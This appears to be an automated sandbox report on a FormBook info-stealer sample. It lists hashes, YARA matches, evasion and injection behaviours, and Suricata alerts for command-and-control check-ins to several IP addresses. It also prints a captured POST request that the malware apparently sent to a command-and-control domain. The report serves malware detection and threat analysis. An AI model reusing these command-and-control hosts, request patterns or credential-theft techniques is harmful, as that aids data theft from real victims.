Edit tour

Windows Analysis Report
alWUxZvrvU.exe

Overview

General Information

Sample name:	alWUxZvrvU.exe renamed because original name is a hash value
Original sample name:	df0c29738d26225d66d84b875da95446c3a523c4ee1541714594f72991902868.exe
Analysis ID:	1530769
MD5:	68e26fff2e508bfecf7fcc9a2c0c8805
SHA1:	eb769b51f5e141e8a13181e2894fec0eacf84dee
SHA256:	df0c29738d26225d66d84b875da95446c3a523c4ee1541714594f72991902868
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

alWUxZvrvU.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\alWUxZvrvU.exe" MD5: 68E26FFF2E508BFECF7FCC9A2C0C8805)

ZVRmRlsEcS.exe (PID: 5596 cmdline: "C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

MRINFO.EXE (PID: 7504 cmdline: "C:\Windows\SysWOW64\MRINFO.EXE" MD5: F664A3E4625D86FC6B389AFF416CF67F)

ZVRmRlsEcS.exe (PID: 2128 cmdline: "C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7764 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e373:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x163a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f36d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3db6ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f36d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3db6ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.alWUxZvrvU.exe.c70000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.alWUxZvrvU.exe.c70000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x165a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T14:12:00.638859+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50038	85.159.66.93	80	TCP
2024-10-10T14:12:34.680981+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49736	194.58.112.174	80	TCP
2024-10-10T14:12:58.299649+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49752	62.149.128.40	80	TCP
2024-10-10T14:13:32.737427+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49838	185.99.134.9	80	TCP
2024-10-10T14:13:46.297111+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50014	217.76.128.34	80	TCP
2024-10-10T14:13:59.930447+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50018	209.146.101.85	80	TCP
2024-10-10T14:14:13.291618+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50022	188.114.97.3	80	TCP
2024-10-10T14:14:27.413214+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50026	203.161.46.201	80	TCP
2024-10-10T14:14:40.818749+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50030	161.97.168.245	80	TCP
2024-10-10T14:14:56.175137+0200	2855465	1	A Network Trojan was detected	192.168.2.4	50034	103.42.108.46	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T14:12:50.500588+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49737	62.149.128.40	80	TCP
2024-10-10T14:12:53.049440+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49738	62.149.128.40	80	TCP
2024-10-10T14:12:55.759636+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49740	62.149.128.40	80	TCP
2024-10-10T14:13:05.231127+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49793	185.99.134.9	80	TCP
2024-10-10T14:13:07.777703+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49806	185.99.134.9	80	TCP
2024-10-10T14:13:10.352393+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49822	185.99.134.9	80	TCP
2024-10-10T14:13:38.587284+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49994	217.76.128.34	80	TCP
2024-10-10T14:13:41.128834+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50010	217.76.128.34	80	TCP
2024-10-10T14:13:43.786802+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50013	217.76.128.34	80	TCP
2024-10-10T14:13:52.274155+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50015	209.146.101.85	80	TCP
2024-10-10T14:13:54.868096+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50016	209.146.101.85	80	TCP
2024-10-10T14:13:57.393572+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50017	209.146.101.85	80	TCP
2024-10-10T14:14:05.613031+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50019	188.114.97.3	80	TCP
2024-10-10T14:14:08.131956+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50020	188.114.97.3	80	TCP
2024-10-10T14:14:10.668388+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50021	188.114.97.3	80	TCP
2024-10-10T14:14:19.711211+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50023	203.161.46.201	80	TCP
2024-10-10T14:14:22.151816+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50024	203.161.46.201	80	TCP
2024-10-10T14:14:24.821000+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50025	203.161.46.201	80	TCP
2024-10-10T14:14:33.177935+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50027	161.97.168.245	80	TCP
2024-10-10T14:14:35.716535+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50028	161.97.168.245	80	TCP
2024-10-10T14:14:38.262215+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50029	161.97.168.245	80	TCP
2024-10-10T14:14:47.611176+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50031	103.42.108.46	80	TCP
2024-10-10T14:14:50.084187+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50032	103.42.108.46	80	TCP
2024-10-10T14:14:52.651104+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50033	103.42.108.46	80	TCP
2024-10-10T14:15:11.074635+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50035	85.159.66.93	80	TCP
2024-10-10T14:15:13.712024+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50036	85.159.66.93	80	TCP
2024-10-10T14:15:16.258993+0200	2855464	1	A Network Trojan was detected	192.168.2.4	50037	85.159.66.93	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-10T14:12:53.049440+0200	2856318	1	A Network Trojan was detected	192.168.2.4	49738	62.149.128.40	80	TCP

HTTP traffic detected: POST /sumy/ HTTP/1.1Host: www.admaioraluxury.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 201Origin: http://www.admaioraluxury.comReferer: http://www.admaioraluxury.com/sumy/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 44 58 33 4c 3d 78 73 6c 30 69 75 43 52 43 2f 68 6b 37 41 78 44 58 52 78 50 68 62 62 53 67 58 30 66 34 4d 41 7a 73 6d 75 75 64 74 4f 63 53 38 34 32 4b 4f 70 6e 35 77 51 52 6b 54 6e 72 67 44 5a 6b 48 71 76 46 2b 58 58 67 4a 72 38 47 6a 30 5a 4e 45 31 55 4a 65 69 32 31 67 48 6c 63 6a 37 38 54 4b 53 6e 48 61 57 30 78 36 6c 61 31 68 2f 51 37 47 61 69 71 47 39 51 4f 74 62 79 52 6c 4a 2f 62 7a 33 79 75 42 45 59 32 56 72 78 75 42 64 77 4b 70 4c 45 51 62 2f 54 44 69 79 72 65 6b 6b 39 59 53 57 46 36 64 6e 4a 36 68 77 59 52 44 31 50 4a 31 75 63 38 70 43 34 69 7a 66 35 37 47 2b 45 37 35 53 78 55 61 67 3d 3d Data Ascii: DX3L=xsl0iuCRC/hk7AxDXRxPhbbSgX0f4MAzsmuudtOcS842KOpn5wQRkTnrgDZkHqvF+XXgJr8Gj0ZNE1UJei21gHlcj78TKSnHaW0x6la1h/Q7GaiqG9QOtbyRlJ/bz3yuBEY2VrxuBdwKpLEQb/TDiyrekk9YSWF6dnJ6hwYRD1PJ1uc8pC4izf57G+E75SxUag==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:12:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 65 6e 64 6c 79 2e 64 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 10 Oct 2024 12:12:49 GMTConnection: closeContent-Length: 4954Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 10 Oct 2024 12:12:52 GMTConnection: closeContent-Length: 4954Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 10 Oct 2024 12:12:55 GMTConnection: closeContent-Length: 4954Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 